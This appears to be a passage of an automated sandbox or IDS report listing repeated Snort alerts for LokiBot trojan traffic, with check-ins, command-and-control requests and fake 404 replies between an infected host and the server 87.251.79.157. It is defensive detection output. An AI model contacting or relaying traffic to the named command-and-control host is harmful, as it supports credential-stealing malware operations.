                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49745 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49745
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49746 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49746 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49746 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49746 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49746
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49747 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49747 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49747 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49747 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49747
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49748 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49748 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49748
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49749 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49749 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49749
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49750 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49750 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49750
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49751 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49751 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49751 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49751 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49751
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49752 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49752 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49752 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49752 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49752
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49753 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49753 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49753 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49753 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49753
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49754 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49754 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49754 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49754 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49754
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49755 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49755 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49755 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49755 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49755
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49756 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49756 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49756 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49756 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49756
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49757 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49757 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49757 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49757 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49757
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49758 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49758 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49758 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49758 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49758
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49759 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49759 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49759 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49759 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49759
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49760 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49760 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49760 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49760 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49760
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49761 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49761 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49761 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49761 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49761
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49762 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49762 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49762 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49762 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49762
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49763 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49763 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49763 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49763 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49763
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49764 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49764 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49764 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49764 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49764
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49765 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49765 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49765 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49765 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49765
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49766 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49766 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49766 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49766 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49766
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49767 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49767 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49767 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49767 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49767
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49768 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49768 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49768 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49768 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49768
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49769 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49769 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49769 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49769 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49769
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49770 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49770 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49770 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49770 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49770
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49771 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49771 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49771 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49771 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49771
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49772 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49772 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49772 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49772 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49772
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49773 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49773 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49773 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49773 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49773
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49774 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49774 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49774 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49774 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49774
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49775 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49775 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49775 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49775 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49775
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49776 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49776 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49776 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49776 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49776
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49777 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49777 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49777 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49777 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49777
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49778 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49778 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49778 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49778 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49778
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49779 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49779 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49779 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49779 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49779
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49780 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49780 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49780 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49780 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49780
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49781 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49781 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49781 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49781 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49781
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49782 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49782 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49782 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49782 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49782
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49783 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49783 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49783 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49783 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49783
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49784 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49784 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49784 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49784 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49784
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49785 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49785 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49785 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49785 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49785
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49786 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49786 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49786 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49786 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49786
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49787 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49787 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49787 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49787 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49787
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49788 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49788 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49788 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49788 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49788
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49789 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49789 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49789 -> 87.251.79.157:80
